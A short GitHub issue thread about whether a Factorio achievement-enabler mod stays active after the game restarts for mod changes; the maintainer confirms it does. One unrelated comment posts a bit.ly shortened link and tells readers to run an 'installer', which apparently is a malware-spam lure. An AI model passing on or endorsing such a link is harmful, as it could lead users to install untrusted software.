### ISSUE TITLE
Does this stay properly initialized after restarting the game by changing your mod list?

### ISSUE THREAD

**Issue by kepler-gray** [oorzkws/FactorioAchievementEnabler#18]
Wanted to double check, as I've currently been closing and reopening the game using the steam launch args every time I change my mods to avoid not making achievement progress, just incase.

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by oorzkws** [comment]
That's a good question! I just tested and achievements stay enabled through the re-launch for changing mods.
